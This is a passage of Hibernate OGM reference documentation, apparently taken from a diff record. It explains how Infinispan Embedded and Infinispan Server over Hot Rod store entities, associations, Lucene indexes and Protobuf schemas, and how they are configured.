\"bankAccounts\" )\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nDavid owns 2 accounts: \"012345\" and \"ZZZ-009\"\n\n.Content of the `AccountOwner` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"David\"] | id | \"David\"\n | SSN | \"0123456\"\n|===\n\n.Content of the `BankAccount` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"account_1\"] | id | \"account_1\"\n | accountNumber | \"X2345000\"\n\n.2+^.^| [\"id\"], [\"account_2\"] | id | \"account_2\"\n | accountNumber | \"ZZZ-009\"\n|===\n\n.Content of the `AccountOwner_BankAccount` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.2+^.^| [\"bankAccounts_id\"], [\"account_1\"]\n.2+^.^| [\"bankAccounts_id\", \"owners_id\"], [\"account_1\", \"David\"]\n | bankAccounts_id\n | \"account_1\"\n\n | owners_id\n | \"David\"\n\n.2+^.^| [\"bankAccounts_id\"], [\"account_2\"]\n.2+^.^| [\"bankAccounts_id\", \"owners_id\"], [\"account_2\", \"David\"]\n | bankAccounts_id\n | \"account_2\"\n\n | owners_id\n | \"David\"\n\n.4+^.^| [\"owners_id\"], 
[\"David\"]\n.2+^.^| [\"owners_id\", \"banksAccounts_id\"], [\"David\", \"account_1\"]\n | bankAccounts_id\n | \"account_1\"\n\n | owners_id\n | \"David\"\n\n.2+^.^| [\"owners_id\", \"banksAccounts_id\"], [\"David\", \"account_2\"]\n | bankAccounts_id\n | \"account_2\"\n\n | owners_id\n | \"David\"\n\n|===\n====\n\n[[ogm-infinispan-transactions]]\n\n==== Transactions\n\nInfinispan supports transactions and integrates with any standard JTA `TransactionManager`;\nthis is a great advantage for JPA users as it allows to experience a _similar_ behaviour\nto the one we are used to when we work with RDBMS databases.\n\nThis capability is only available to Infinispan Embedded users: the transactional integration\ncapabilities are not exposed to the Hot Rod clients.\n\nIf you're having Hibernate OGM start and manage Infinispan,\nyou can skip this as it will inject the same `TransactionManager` instance\nwhich you already have set up in the Hibernate \/ JPA configuration.\n\nIf you are providing an already started Infinispan CacheManager instance\nby using the [acronym]`JNDI` lookup approach,\nthen you have to make sure the CacheManager is using the same `TransactionManager`\nas Hibernate:\n\n.Configuring a JBoss Standalone TransactionManager lookup in Infinispan configuration\n====\n[source, XML]\n----\n<default>\n <transaction\n transactionMode=\"TRANSACTIONAL\"\n transactionManagerLookupClass=\n \"org.infinispan.transaction.lookup.JBossStandaloneJTAManagerLookup\" \/>\n<\/default>\n----\n====\n\nInfinispan supports different transaction modes like `PESSIMISTIC` and `OPTIMISTIC`,\nsupports [acronym]`XA` recovery and provides many more configuration options;\nsee the http:\/\/infinispan.org\/documentation\/[Infinispan User Guide]\nfor more advanced configuration options.\n\n[[ogm-infinispan-indexstorage]]\n\n==== Storing a Lucene index in Infinispan\n\nHibernate Search, which can be used for advanced query capabilities (see <<ogm-query>>),\nneeds some place to store the indexes for its embedded `Apache Lucene` engine.\n\nA common place to store these indexes is the filesystem\nwhich is the default for Hibernate Search;\nhowever if your goal is to scale your NoSQL engine on multiple nodes\nyou need to share this index.\nNetwork sharing file systems are a possibility but we don't recommended that.\nOften the best option is to store the index\nin whatever NoSQL database you are using (or a different dedicated one).\n\n[TIP]\n====\nYou might find this section useful even if you don't intend to store your data in Infinispan.\n====\n\nThe Infinispan project provides an adaptor to plug into Apache Lucene,\nso that it writes the indexes in Infinispan and searches data in it.\nSince Infinispan can be used as an application cache to other NoSQL storage engines\nby using a CacheStore (see <<ogm-infinispan-storage>>)\nyou can use this adaptor to store the Lucene indexes\nin any NoSQL store supported by Infinispan:\n\n* JDBC databases\n* Cassandra\n* Filesystem (but locked correctly at the Infinispan level)\n* MongoDB\n* HBase\n* LevelDB\n* A secondary (independent) Infinispan grid\n\n\nHow to configure it? 
Here is a simple cheat sheet to get you started with this type of setup:\n\n* Add `org.infinispan:infinispan-directory-provider:{infinispanVersion}` to your dependencies\n* Set these configuration properties:\n\n** `hibernate.search.default.directory_provider = infinispan`\n** `hibernate.search.default.exclusive_index_use = false`\n** `hibernate.search.infinispan.configuration_resourcename =` [infinispan configuration filename]\n\nThis configuration is simple and will work fine in most scenarios, but keep in mind that running with\n`exclusive_index_use = false` will be neither fast nor scalable.\nFor high performance, high concurrency or production use please refer to the\nhttp:\/\/infinispan.org\/documentation\/[Infinispan documentation] for more advanced configuration options and tuning.\n\nThe referenced Infinispan configuration should define a `CacheStore`\nto load\/store the index in the NoSQL engine of choice.\nIt should also define three cache names:\n\n.Infinispan caches used to store indexes\n[cols=\"1,2,1\", options=\"header\"]\n|===============\n|Cache name|Description|Suggested cluster mode\n|LuceneIndexesLocking|Transfers locking information. Does not need a cache\n store.|replication\n|LuceneIndexesData|Contains the bulk of Lucene data. Needs a cache\n store.|distribution + L1\n|LuceneIndexesMetadata|Stores metadata on the index segments. Needs a cache\n store.|replication\n|===============\n\nThis configuration is not going to scale well on write operations:\nto do that you should read about the master\/slave and sharding options in Hibernate Search.\nThe complete explanation and configuration options can be found in the\nhttps:\/\/docs.jboss.org\/hibernate\/search\/{hibernate-search-major-minor-version}\/reference\/en-US\/html_single\/#infinispan-directories[Hibernate Search Reference Guide].\n\nSome NoSQL engines support storing Lucene indexes directly,\nin which case you might skip the Infinispan Lucene integration\nby implementing a custom `DirectoryProvider` for Hibernate Search.\nYou're very welcome to share the code\nand have it merged in Hibernate Search for others to use, inspect, improve and maintain.\n\n[[ogm-infinispan-remote]]\n\n=== Hibernate OGM & Infinispan Server over Hot Rod\n\nIn this section we'll see how to configure Hibernate OGM to connect to\n\"Infinispan Server using the Hot Rod protocol\", which we will call \"Infinispan Remote\"\nfor brevity and to differentiate it from \"Infinispan Embedded\".\n\nIn this mode Hibernate OGM cannot bootstrap or otherwise control the lifecycle\nof Infinispan, so we will assume that you already have a cluster of Infinispan Server\nnodes running.\nFor instructions on setting one up, see the http:\/\/infinispan.org\/docs\/stable\/server_guide\/server_guide.html[Infinispan Server Guide].\n\nThe good news is that - since it's a separate service - there won't be much to configure\nin Hibernate OGM.\n\n[CAUTION]\n====\nThe Hibernate OGM support for Infinispan Remote is considered experimental.\nIn particular, the storage format is not set in stone.\n====\n\n==== Adding Infinispan Remote dependencies\n\nTo use Hibernate OGM to connect to an Infinispan Server using the Hot Rod protocol, you will need the following extension\nand its transitive dependencies (which include, among others, the Hot Rod client):\n \n[source, XML]\n[subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.hibernate.ogm<\/groupId>\n <artifactId>hibernate-ogm-infinispan-remote<\/artifactId>\n 
<version>{hibernate-ogm-version}<\/version>\n<\/dependency>\n----\n\n==== Configuration properties for Infinispan Remote\n\nFirst, let Hibernate know that you want to use the OGM Infinispan Remote datastore by setting the\n`hibernate.ogm.datastore.provider` property to `infinispan_remote`.\n\nThe next step is to configure the Hot Rod client.\nYou have two options:\n\n* either provide a resource file containing all Hot Rod client configuration properties\n* or include all the Hot Rod client configuration properties with a custom prefix, as explained below.\n\nTo use an external configuration resource, set the `hibernate.ogm.infinispan_remote.configuration_resource_name`\nconfiguration property to the resource name.\n\n.Using a separate resource to configure the Hot Rod client\n====\n[source, XML]\n----\n<?xml version=\"1.0\"?>\n<persistence xmlns=\"http:\/\/java.sun.com\/xml\/ns\/persistence\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/persistence http:\/\/java.sun.com\/xml\/ns\/persistence\/persistence_2_0.xsd\"\n\tversion=\"2.0\">\n\n\t<persistence-unit name=\"ogm-with-hotrod\">\n\t\t<provider>org.hibernate.ogm.jpa.HibernateOgmPersistence<\/provider> # <1>\n\t\t<properties>\n\t\t\t<property name=\"hibernate.ogm.datastore.provider\"\n\t\t\t\tvalue=\"infinispan_remote\" \/> # <2>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.configuration_resource_name\"\n\t\t\t\tvalue=\"hotrodclient.properties\" \/> # <3>\n\t\t<\/properties>\n\t<\/persistence-unit>\n<\/persistence>\n----\n<1> Choose Hibernate OGM as JPA Provider\n<2> pick `infinispan_remote` as datastore\n<3> point to the Hot Rod configuration file\n\n[source]\n----\ninfinispan.client.hotrod.server_list = 127.0.0.1:11222\ninfinispan.client.hotrod.tcp_no_delay = true\ninfinispan.client.hotrod.tcp_keep_alive = false\n\n## below is connection pooling config\nmaxActive=-1\nmaxTotal = -1\nmaxIdle = -1\nwhenExhaustedAction = 1\ntimeBetweenEvictionRunsMillis = 120000\nminEvictableIdleTimeMillis = 300000\ntestWhileIdle = true\nminIdle = 1\n----\n====\n\nAlternatively you can embed the Hot Rod properties in your Hibernate (or JPA) configuration\nfile, but you'll have to replace the `infinispan.client.hotrod.` prefix with the custom\nprefix `hibernate.ogm.infinispan_remote.client.`.\n\nSome of the Hot Rod client configuration properties don't normally use a prefix - specifically\nall properties relating to connection pooling as in the previous example - these will also\nneed to use the `hibernate.ogm.infinispan_remote.client.` prefix.\n\nProperties set with the `hibernate.ogm.infinispan_remote.client.` prefix will override the same\nproperties configured using an external reosurce file.\n\n.Embedding the Hot Rod client configuration properties in the Hibernate configuration\n====\n[source, XML]\n----\n<?xml version=\"1.0\"?>\n<persistence xmlns=\"http:\/\/java.sun.com\/xml\/ns\/persistence\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/persistence http:\/\/java.sun.com\/xml\/ns\/persistence\/persistence_2_0.xsd\"\n\tversion=\"2.0\">\n\n\t<persistence-unit name=\"ogm-with-hotrod\">\n\t\t<provider>org.hibernate.ogm.jpa.HibernateOgmPersistence<\/provider> # <1>\n\t\t<properties>\n\t\t\t<property name=\"hibernate.ogm.datastore.provider\"\n\t\t\t\tvalue=\"infinispan_remote\" \/> # <2>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.server_list\"\n\t\t\t\tvalue=\"127.0.0.1:11222\" 
\/> # <3>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.tcp_no_delay\"\n\t\t\t\tvalue=\"true\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.tcp_keep_alive\"\n\t\t\t\tvalue=\"false\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.maxActive\"\n\t\t\t\tvalue=\"-1\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.maxTotal\"\n\t\t\t\tvalue=\"-1\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.maxIdle\"\n\t\t\t\tvalue=\"-1\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.whenExhaustedAction\"\n\t\t\t\tvalue=\"1\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.timeBetweenEvictionRunsMillis\"\n\t\t\t\tvalue=\"120000\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.minEvictableIdleTimeMillis\"\n\t\t\t\tvalue=\"300000\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.testWhileIdle\"\n\t\t\t\tvalue=\"true\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.minIdle\"\n\t\t\t\tvalue=\"1\" \/>\n\t\t<\/properties>\n\t<\/persistence-unit>\n<\/persistence>\n----\n<1> Choose Hibernate OGM as JPA Provider\n<2> pick `infinispan_remote` as datastore\n<3> include Hot Rod configuration properties, just replacing\/adding the OGM prefix.\n====\n\nIn the next section we'll see a couple more advanced properties which might be of interest.\n\nhibernate.ogm.infinispan_remote.schema_capture_service::\nIf you set this to an implementation of `org.hibernate.ogm.datastore.infinispanremote.schema.spi.SchemaCapture` you\ncan collect any generated Protobuf Schema. Could be useful for integrations with other tools.\nYou can either provide a fully qualified classname or a `SchemaCapture`, or pass an instance of a `SchemaCapture`\nin the configuration properties, if you're booting Hibernate programmatically.\n\nhibernate.ogm.infinispan_remote.schema_package_name::\nDefines the package name of the generated Protobuf schema. 
\n\n==== Data encoding: Protobuf Schema\n\nUsing the _Infinispan Remote_ backend your data will be encoded using Protocol Buffers,\nalso known as Protobuf.\n\n> Protocol Buffers are a language-neutral, platform-neutral\n> extensible mechanism for serializing structured data\n> -- https:\/\/developers.google.com\/protocol-buffers\/\n\nThis encoding strategy will be used both during _transmission_ to and from the datagrid, and\nas a _storage format_ on the Infinispan Server.\n\nTypical usage of Google's developer tools for Java would require you to download the `protoc`\ncompiler to generate Java stubs; you won't need that when using Hibernate OGM as the backend\nwill generate the encoding and decoding functions on the fly from your entities.\n\nHaving Hibernate OGM generate the schema for you makes it easier to get\nstarted, but there's a drawback: you are not directly in control of the protobuf schema.\nHibernate OGM will deploy this schema - or expect a compatible schema to be deployed - as it will use\nits generated codecs to read and write data to the Infinispan Server.\n\nThe protobuf technology is designed to allow evolution of your schema: you can deploy a\ndifferent schema on the Infinispan Server than the one OGM expects, but this is an advanced\ntopic and you'll have to make sure the deployed schema is compatible with the one OGM is\ngenerating and using.\n\nAnother reason to make sure the deployed protobuf schema is a _compatible evolution_ of\na previous schema is to make sure you can still read data which is already stored in\nthe datagrid.\n\n[IMPORTANT]\n====\nRemember that the Protobuf schema is used both during _transmission_ and _storage_.\nThe fact that it's used also during _transmission_ of your data is a key difference from the\nschema of a SQL database.\n\nFor example even if a property \"A\" is not nullable in terms of storage, you will still\nwant it to be flagged as `optional` in a protobuf schema to allow, for example, retrieving\na subset of data properties without having to always retrieve the property \"A\".\n====\n\nYou don't need to do anything regarding the schema: Hibernate OGM will automatically\ndeploy it to the Infinispan datagrid at bootstrap of Hibernate.\nYou might want to keep this in mind though, both to be able to evolve your schema\nwithout data loss, and to be able to generate decoders for other Infinispan clients not\nusing Hibernate OGM.\n\nThe deployed schemas can be fetched from the Infinispan Server; Hibernate OGM also\nlogs the generated schemas at `INFO` level in the logging category\n`org.hibernate.ogm.datastore.infinispanremote.impl.protobuf.SchemaDefinitions`.\n\n[[storage-principles-of-infinispan-dataprovider]]\n\n==== Storage Principles of the Infinispan Remote dataprovider\n\nThis is actually very simple.\n\nImagine you were mapping your entities to a traditional, table based [acronym]`RDBMS`;\nnow instead of tables, you have caches. 
Each cache has a name, and a consistent schema,\nand for each cache we define a key with some properties (the id, aka the primary key).\n\nRelations are mapped by encoding a \"foreign key\"; these are used either as keys to perform\na key lookup on another table, or in queries on other tables to identify\nrelations with a cardinality higher than one.\n\nSo let's highlight the differences with the relational world:\n\nReferential integrity::\nWhile we can use relations based on foreign keys, Infinispan has no notion of referential integrity.\nHibernate is able to maintain the integrity as it won't \"forget\" stale references, but since\nthe storage doesn't support transactions either, it is possible to interrupt Hibernate OGM\nduring such maintenance and introduce breaks of integrity.\n\nWhen integrity could be broken::\nWhen the unit of work involves several operations we risk partial writes\n(updates, deletes, inserts); since the Hot Rod client is not transactional,\nsome operations would be flushed to the data store and others not.\nFor instance let's imagine you create a new entity, remove an old one and update an association\nfrom the old to the new one in a single transaction;\nthis would correspond to three different remote invocations: an Entity insert, an Entity delete\nand an Association update.\nIf there were network problems during the third invocation,\nwe could have a partial write in which only the first and the second operations\nwould actually be stored on the remote storage; this could break the referential\nintegrity of the association.\n\nHow to detect broken integrity::\nUnfortunately, at the moment the only way to detect a referential integrity error is to\ninspect the logs for error messages or periodically monitor the associations cache.\n\nA key. And a Value.::\nIn a key\/value store the two elements _key_ and _value_ are different, separate objects.\nThe schema - and consequently all operations - generated by Hibernate OGM will treat\nand encode these two objects separately. You will notice that the attributes of the key\nare encoded in the value *as well*, as it is not possible to run e.g. 
range queries\non attributes of keys.\n\nNo Sequences, no auto-incrementing values::\nInfinispan does not support sequences, yet allows concurrent \"compare and set\" operations;\nHibernate OGM makes use of such CAS operations to emulate sequences and auto-incrementing\nprimary keys if your entity mapping uses them; however, this solution might not work\nunder high load: make sure to use a different strategy, such as assigning IDs explicitly,\nor using the `org.hibernate.id.UUIDGenerator` generator (see the sketch after the schema example below).\nHibernate OGM will log a warning if it detects excessive spinning on such CAS operations.\n\nNot mapped to JDBC types, but to Protobuf types::\nRather than mapping your Java properties to corresponding JDBC (SQL) types, your Java\nproperties are mapped to Protobuf types.\nSee the https:\/\/developers.google.com\/protocol-buffers\/docs\/proto#scalar[protobuf documentation]\nfor an overview of protocol buffer \"primitive\" types.\n\n.Example auto-generated Protobuf Schema for a simple entity\n====\n[source, JAVA]\n----\nimport javax.persistence.Column;\nimport javax.persistence.Entity;\nimport javax.persistence.Id;\n\n@Entity\npublic class Hypothesis {\n\n\t@Id String id;\n\n\tString description;\n\n\t@Column(name = \"pos\")\n\tint position;\n\n}\n----\n[source]\n----\npackage HibernateOGMGenerated; # <1>\n\nmessage Hypothesis_id { # <2>\n\trequired string id = 1;\n}\n\nmessage Hypothesis {\n\trequired string id = 1;\n\toptional string description = 2;\n\toptional int32 pos = 3; # <3>\n}\n----\n<1> The default Protobuf package name.\n<2> A dedicated message type for the Key of the Key\/Value pair\n<3> The `pos` attribute name respects the option of the `@Column` annotation\n====\n\nThe above example shows what a Protobuf schema looks like, as automatically generated from a mapped entity.\nAny property type supported by Hibernate ORM will be converted to a matching Protobuf type.
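\n\nTying back to the identifier advice above, here is a minimal sketch of an entity whose identifier is generated client-side as a UUID, avoiding the CAS-based sequence emulation entirely (the `Breed` entity is purely illustrative; `uuid2` is the standard Hibernate UUID generation strategy):\n\n.Using a client-side generated UUID identifier (sketch)\n====\n[source, JAVA]\n----\nimport javax.persistence.Entity;\nimport javax.persistence.GeneratedValue;\nimport javax.persistence.Id;\n\nimport org.hibernate.annotations.GenericGenerator;\n\n@Entity\npublic class Breed {\n\n @Id\n @GeneratedValue(generator = \"uuid\")\n @GenericGenerator(name = \"uuid\", strategy = \"uuid2\")\n private String id;\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n====\n\nSince the identifier is computed by the client, no remote CAS round-trips are needed when inserting new entities.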
\n\n===== Each Table requires a Cache with the same name\n\nIn a relational database world, when Hibernate defines the schema this implicitly creates the tables;\nthis is not the case on Infinispan.\n\nWith Infinispan, the _Protobuf Schema_ just unlocks the capability to transmit messages with\nsuch payloads (read\/write), and allows the remote servers to process the fields, for example\nto execute queries and extract projections out of the stored entries.\nSo this establishes a transmission and storage encoding contract, but doesn't actually\nstart or allocate any storing Cache.\n\nHibernate OGM by convention will write to several named ``Cache``s, mapping each \"table name\"\nto a \"cache name\". In the above example, the `Hypothesis` entity will\nbe written to a Cache named `Hypothesis`.\n\nThe benefit is that you can tune each cache (each \"table\") independently; for example you could\nconfigure the caches for the most important data to have a synchronous CacheStore which replicates\ndata to a relational database, and have less important entries use an asynchronous CacheStore,\nor none at all, to favour performance over redundancy.\n\nThe drawback of this design choice is that each named cache must be pre-defined in the Infinispan\nServer configuration: at this point, the Hot Rod protocol does not allow starting missing caches,\nso Hibernate OGM cannot define the missing tables automatically.\nIt generates the encoding Protobuf schema, but you have to list the Cache names in the server configuration.\n\n[WARNING]\n====\nFor each \"table name\" your model would generate on a relational database, you have to define\na matching Cache on the Infinispan Server.\n\nIf any Cache is missing, Hibernate OGM will fail to start and list which table names were\nexpected, but not found. We plan to automate the creation of missing caches in the future.\n====
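\n\nFor instance, continuing the `Hypothesis` example, here is a minimal sketch of the matching cache declarations in the Infinispan Server configuration (the container name, the cache mode and the `hibernate_sequences` cache for table-based id generators are illustrative assumptions - adapt them to your model and server setup):\n\n.Declaring the caches expected by Hibernate OGM on the server (sketch)\n====\n[source, XML]\n----\n<cache-container name=\"clustered\" default-cache=\"default\">\n <!-- one cache per \"table name\" derived from your mapped entities -->\n <distributed-cache name=\"Hypothesis\" mode=\"SYNC\"\/>\n <!-- id sources need a backing cache too, if your mapping uses them -->\n <distributed-cache name=\"hibernate_sequences\" mode=\"SYNC\"\/>\n<\/cache-container>\n----\n====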
Automatic creation of ``Cache``s::\nWhen deploying the _Protobuf Schema_, we should also automatically define and start\nthe needed Caches if they are not defined.\nThis is currently not allowed over the Hot Rod protocol.\n\n","old_contents":"[[ogm-infinispan]]\n\n\/\/ vim: set colorcolumn=100:\n\n== Infinispan\n\nInfinispan is an open source in-memory data grid focusing on high performance.\nAs a data grid, you can deploy it on multiple servers - referred to as nodes -\nand connect to it as if it were a single storage engine:\nit will cleverly distribute both the computation effort and the data storage.\n\nIt is trivial to set up on a single node and Hibernate OGM knows how to boot one,\nso you can easily try it out.\nBut Infinispan really shines in multiple node deployments:\nyou will need to configure some networking details\nbut nothing changes in terms of application behaviour,\nwhile performance and data size can scale linearly.\n\nOf all its features we will only describe those relevant to Hibernate OGM;\nfor a complete description of all its capabilities and configuration options,\nrefer to the Infinispan project documentation at\nhttp:\/\/infinispan.org\/documentation\/[infinispan.org].\n\n=== Why use Hibernate OGM with Infinispan?\n\nInfinispan provides great scalability and elasticity features,\nbut it can have a steep learning curve.\n\nIf you are already familiar with the JPA API you will\nbe able to store your data in Infinispan quickly, and you will also benefit\nfrom the optimizations that a framework like Hibernate OGM can\napply under the hood.\n\nIn particular:\n\n* you can get started without having to learn `Protobuf` first\n* no need to learn the Infinispan API\n* Hibernate OGM will set up and manage the `Hot Rod client` for you\n* same API as Hibernate ORM, meaning that you can use the same tools\n\nYou will still need to learn about Infinispan, all its capabilities and how to configure\nthem to reach your application's top performance, but you can get a proof of concept\ndone quickly with the example configuration.\n\n=== Infinispan: Choosing between Embedded Mode and Hot Rod\n\nJava applications can use Infinispan in two fundamentally different ways:\n\n* Run Infinispan in _Embedded Mode_.\n* Connect to an _Infinispan Server_ using a _Hot Rod client_.\n\nHibernate OGM supports connecting in either mode, but since the APIs and capabilities\nare different in the two modes, it provides two different modules,\neach having its own set of configuration options and features.\n\nRunning Infinispan in _Embedded Mode_ implies that the Infinispan node is running\nin the same JVM as the code using it.\nThe benefit is that some data (or all data) will be stored on the same JVM, making reads\nof this data extremely fast and efficient as there won't be RPCs to other systems.\nWrite operations will still need to issue some coordination RPCs but they also\nbenefit from a reduction of necessary operations.\n\n
However, the very fact that some data is stored in the same JVM is also the drawback\nof this choice: this typically implies having to configure your JVM for larger\nheap sizes, which are harder to tune for optimal performance.\nOther system parameters might also need to be configured, as this JVM node is now to be treated\nas a \"data holding node\" rather than a stateless app node.\nSome architects and system administrators will not like that.\n\nWhen connecting to an _Infinispan Server_ over the _Hot Rod client_, the architecture\nis similar to having Hibernate connect to a traditional database: the data is stored\non the _Infinispan Server_ nodes, and Hibernate OGM uses a client with a pool of\nTCP connections to talk to the server.\n\nAnother important difference is that when connecting to _Infinispan Server_ via\n_Hot Rod_ the data is encoded using _Google Protobuf_, which requires a schema.\nThis schema is auto-generated by Hibernate OGM.\n\nHaving a _Protobuf Schema_ makes it possible to evolve the schema in non-destructive\nways, and makes it possible for other clients to access the data - even clients written\nin other programming languages.\n\n[NOTE]\n====\nMost introductory tutorials of Hibernate OGM focus on Infinispan in _Embedded Mode_\nbecause in this mode OGM can start its own embedded Infinispan node, using\na simple, local-only Infinispan configuration.\n\nWhen using _Infinispan Server_ instead, you'll need to http:\/\/infinispan.org\/download\/[download\nthe server distribution], unpack and start it, then set the Hibernate OGM configuration\nproperties so that the integrated Hot Rod client knows how to connect to it.\n====\n\n[TIP]\n====\n[.lead]\nAdvanced performance options & interaction with Hibernate 2nd level caching\n\nWhen using Infinispan in Embedded Mode, with its caches configured in `REPLICATION` mode,\nall nodes will contain a full replica of the database: write performance won't scale, but\nyour reads will be very fast and scale up linearly with the size of the cluster,\nmaking usage of Hibernate's 2nd level cache redundant.\n\nWhen configuring Infinispan in `DISTRIBUTED` cache mode, each of your nodes will have a\nlocal copy of a slice of your data; remember you can tune how large each slice\nshould be with various Infinispan configuration options (such as _numOwners_), and you\ncould combine this with Hibernate's 2nd level caching and\/or enable Infinispan's\n1st level caching.\n\nYou can even combine Infinispan with having it passivate to other storage systems\nsuch as an RDBMS or another NoSQL engine; such storage can be configured to be asynchronous.\nThis option is available to both Infinispan Embedded and Infinispan Server; it's even possible\nto use a light layer of Infinispan Embedded - containing a small data set - and have it\nbacked by an Infinispan Server cluster to expand its storage capabilities without\nhaving to enlarge the heap size too much on the embedded application nodes.\n\nFinally, remember that options such as replication vs distribution (`CacheMode`) and passivation\nto additional storage (``CacheStore``s) can be configured differently for each Infinispan cache.\n====\n\n[[ogm-infinispan-embedded]]\n=== Hibernate OGM & Infinispan Embedded\n\nLet's see how to configure and use Hibernate OGM with Infinispan in Embedded Mode.\n\nFor usage of Infinispan Server over Hot Rod, skip to <<ogm-infinispan-remote>>.\n\n[[ogm-infinispan-configuration]]\n\n==== Configure Hibernate OGM for Infinispan Embedded\n\nConfiguring Hibernate OGM and Infinispan basically takes two steps:\n\n* Add the dependencies to your classpath\n* And then choose one of:\n\n** Use the default Infinispan configuration (no action needed)\n** Point to your own configuration resource file\n** Point to a [acronym]`JNDI` name of an existing instance of an Infinispan `CacheManager`\n\n* If you need to run JPQL or HQL queries, add Hibernate Search on the classpath\n (<<ogm-query-using-hibernate-search>>)\n\n
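When booting programmatically, the second step boils down to a couple of configuration properties (described in detail below). The following is a minimal sketch, assuming a persistence unit named `ogm-infinispan-pu` that declares `org.hibernate.ogm.jpa.HibernateOgmPersistence` as its provider; the configuration file name `my-infinispan.xml` is a placeholder:\n\n[source, JAVA]\n----\nimport java.util.HashMap;\nimport java.util.Map;\n\nimport javax.persistence.EntityManagerFactory;\nimport javax.persistence.Persistence;\n\npublic class OgmInfinispanBootstrap {\n\n    public static void main(String[] args) {\n        Map<String, String> settings = new HashMap<>();\n        \/\/ Select the Infinispan Embedded datastore provider:\n        settings.put( \"hibernate.ogm.datastore.provider\", \"infinispan_embedded\" );\n        \/\/ Optional: point to your own Infinispan configuration resource;\n        \/\/ omit this to use the default configuration:\n        settings.put( \"hibernate.ogm.infinispan.configuration_resource_name\", \"my-infinispan.xml\" );\n\n        EntityManagerFactory emf = Persistence.createEntityManagerFactory( \"ogm-infinispan-pu\", settings );\n        \/\/ ... use the EntityManagerFactory ...\n        emf.close();\n    }\n}\n----\n\n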
Note that, except when using [acronym]`JNDI`, Hibernate OGM will bootstrap an Infinispan Embedded node\nin the same JVM, and terminate it on shutdown of the Hibernate instance.\n\n[CAUTION]\n====\nIf you have Hibernate OGM boot Infinispan using a clustered configuration, it might automatically join the cluster of\nother Infinispan nodes running in your network: the default is automatic discovery!\n====\n\n[[ogm-infinispan-adddepencies]]\n\n==== Adding Infinispan dependencies\n\nTo add the dependencies for the Hibernate OGM extensions for Infinispan Embedded via Maven, add the following module:\n\n\n[source, XML]\n[subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.hibernate.ogm<\/groupId>\n <artifactId>hibernate-ogm-infinispan-embedded<\/artifactId>\n <version>{hibernate-ogm-version}<\/version>\n<\/dependency>\n----\n\nIf you're not using a dependency management tool,\ncopy all the dependencies from these directories of the distribution:\n\n* `\/lib\/required`\n* `\/lib\/infinispan`\n* Optionally - depending on your container - you might need some of the jars from `\/lib\/provided`\n\n\n[[ogm-infinispan-configuration-properties]]\n\n==== Infinispan specific configuration properties\n\nThe advanced configuration details of an Infinispan Cache\nare defined in an Infinispan-specific XML configuration file;\nthe Hibernate OGM properties are simple\nand usually just point to this external resource.\n\nTo use the default configuration provided by Hibernate OGM -\nwhich is a good starting point for new users - you don't have to set any property.\n\n.Hibernate OGM properties for Infinispan\n`hibernate.ogm.datastore.provider`::\nSet it to `infinispan_embedded` to use Infinispan as the datastore provider in embedded mode.\n`hibernate.ogm.infinispan.cachemanager_jndi_name`::\nIf you have an Infinispan `EmbeddedCacheManager` registered in JNDI,\nprovide the JNDI name and Hibernate OGM will use this instance\ninstead of starting a new `CacheManager`.\nThis will ignore any further configuration properties,\nas Infinispan is assumed to be already configured.\nInfinispan can typically be pushed to JNDI via WildFly, Spring or Seam.\n`hibernate.ogm.infinispan.configuration_resource_name`::\nShould point to the resource name of an Infinispan configuration file.\nThis is ignored in case a [acronym]`JNDI` lookup is set.\nDefaults to `org\/hibernate\/ogm\/datastore\/infinispan\/default-config.xml`.\n`hibernate.ogm.datastore.keyvalue.cache_storage`::\nThe strategy for persisting data in Infinispan.\nThe following two strategies exist (values of the `org.hibernate.ogm.datastore.keyvalue.options.CacheMappingType` enum):\n\n* `CACHE_PER_TABLE`: A dedicated cache will be used for each entity type, association type and id source table.\n* `CACHE_PER_KIND`: Three caches will be used: one cache for all entities, one cache for all associations and one cache for all id sources.\n\n+\nDefaults to `CACHE_PER_TABLE`. It is the recommended strategy as it makes it easier to target a specific cache for a given entity.\n
`hibernate.ogm.datastore.create_database`::\nIf set to `true`, Hibernate OGM will create any missing Cache definitions on the Infinispan Server.\nThis requires the Infinispan Server configuration to have a default configuration defined, as this will be copied to the newly defined caches.\nIf set to `false`, an exception is thrown when a Cache is expected but not explicitly configured on the server.\nDefaults to `false`.\n\n[NOTE]\n====\nWhen bootstrapping a session factory or entity manager factory programmatically,\nyou should use the constants accessible via `org.hibernate.ogm.datastore.infinispan.InfinispanProperties`\nwhen specifying the configuration properties listed above.\n\nCommon properties shared between stores are declared on `OgmProperties`\n(a super interface of `InfinispanProperties`).\n\nFor maximum portability between stores, use the most generic interface possible.\n====\n\n==== Cache names used by Hibernate OGM\n\nDepending on the cache mapping approach, Hibernate OGM will either:\n\n* store each entity type, association type and id source table in a dedicated cache,\n very much like what Hibernate ORM would do. This is the `CACHE_PER_TABLE` approach.\n* store data in three different caches when using the `CACHE_PER_KIND` 